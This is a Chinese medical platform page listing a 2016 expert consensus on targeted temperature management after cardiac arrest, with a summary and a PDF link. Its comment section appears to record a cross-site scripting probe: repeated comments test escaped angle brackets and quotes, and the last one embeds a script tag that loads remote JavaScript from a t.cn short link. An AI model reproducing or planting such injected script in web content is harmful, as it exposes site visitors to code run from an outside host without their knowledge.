医平台知识手册

临床指南 > 心血管内科 > 心脏骤停后目标温度管理专家共识

心脏骤停后目标温度管理专家共识

发布时间:

发布机构:
国内急诊/重症相关专家小组(统称)心脏骤停后目标温度管理共识专家组
来源:

中华急诊医学杂志.2016,25(8):1000-1006.

内容介绍:

为了反映最新推荐目标温度范围的变化,《2015年心肺复苏和心血管急救指南》采用了“目标温度管理”(TTM)的概念。CA后TTM就是应用物理方法把体温快速降到既定目标水平,并维持在恒定温度一段时间后缓慢..显示全部 >>

为了反映最新推荐目标温度范围的变化,《2015年心肺复苏和心血管急救指南》采用了“目标温度管理”(TTM)的概念。CA后TTM就是应用物理方法把体温快速降到既定目标水平,并维持在恒定温度一段时间后缓慢恢复至基础体温,并且避免体温反弹的过程。在国外,TTM已经成为CA患者ROSC后的常规治疗手段,但在国内还没有得到很好的规范应用。所以希望通过制定CA后TTM专家共识让更多的国内同行对TTM有更深入的认识和了解,将TTM更好地应用于临床,服务于CA患者。

指南下载:

心脏骤停后目标温度管理专家共识.pdf

文件大小: 0.9M

点评指南

0/20

全部评论

>2016-08-09 15:06

啊啊啊啊%3c%3e"\'

>2016-08-09 15:05

啊啊啊啊%3c%3e"'

>2016-08-09 15:05

啊啊啊啊%3c%3e"

>2016-08-09 15:04

啊啊啊啊%3c%3e

>2016-08-09 15:03

啊啊啊啊<>

>2016-08-09 15:03

啊啊啊啊<>

>2016-08-09 15:02

啊啊啊啊<>

>2016-08-09 15:01

啊啊啊啊<script src=http://t.cn/RtqnHib></script>